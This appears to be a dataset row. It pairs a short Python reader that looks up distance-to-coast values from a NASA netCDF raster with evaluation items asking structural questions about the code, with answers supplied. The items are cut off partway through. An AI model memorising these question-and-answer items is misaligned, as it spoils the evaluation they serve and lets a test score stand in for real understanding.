nc = netCDF4.Dataset(RASTER_NASA_COASTLINE)
DISTANCE_COASTs = nc.variables['distance_to_coast'][:]
LON_COASTs = nc.variables['lon'][:]
LAT_COASTs = nc.variables['lat'][:]
nc.close()
def latlon2ij ( lat,lon,shape2D,llbox ) :
"""
convert lat,lon into i,j index
args:
lat (float or 1D nd.array):
lon (float or 1D nd.array):
shape2D (tuple): (10,20) for instance
llbox (tuple): latmin, lonmin, latmax,lonmax
"""
logging.debug('input lat latlon2ij | %s',lat)
latmin,lonmin,latmax,lonmax = llbox
if isinstance(lat,float) or isinstance(lat,int) :
lat = np.array([lat])
if isinstance(lon,float) or isinstance(lon,int) :
lon = np.array([lon])
dlon = lonmax - lonmin
dlat = latmax - latmin
logging.debug('dlon = %s',dlon)
logging.debug('dlat = %s',dlat)
logging.debug('shape2D = %s',shape2D)
logging.debug('lat type %s %s',type(lat),lat)
logging.debug('lat range %s %s',lat.min(),lat.max())
logging.debug('dlat %s shapz %s',dlat,shape2D)
logging.debug('itest %s',np.floor((lat - latmin) * shape2D[0] / dlat))
i = np.floor((lat - latmin) * shape2D[0] / dlat).astype(
int) # changed May 2019 after founding a bug with B. Coatanea where indices can reach the maximum value of the shape... (agrouaze)
j = np.floor((lon - lonmin) * shape2D[1] / dlon).astype(int)
return i,j
def get_distance_to_coast_vecto(lons,lats):
llbox=(LAT_COASTs[0],LON_COASTs[0],LAT_COASTs[-1],LON_COASTs[-1])
indlat,indlon= latlon2ij(lats,lons,np.shape(DISTANCE_COASTs),llbox)
indlat[(indlat>=DISTANCE_COASTs.shape[0])] = DISTANCE_COASTs.shape[0]-1
indlon[(indlon>=DISTANCE_COASTs.shape[1])] = DISTANCE_COASTs.shape[1]-1
dsts = DISTANCE_COASTs[indlat,indlon]
diff_lon = lons-LON_COASTs[indlon]
diff_lat = lats-LAT_COASTs[indlat]
return dsts | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | src/kpi_WV_nrcs/reader_nasa_gsfc_distance_to_coast_super_light.py | tlechauveCLS/kpi_mpc |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.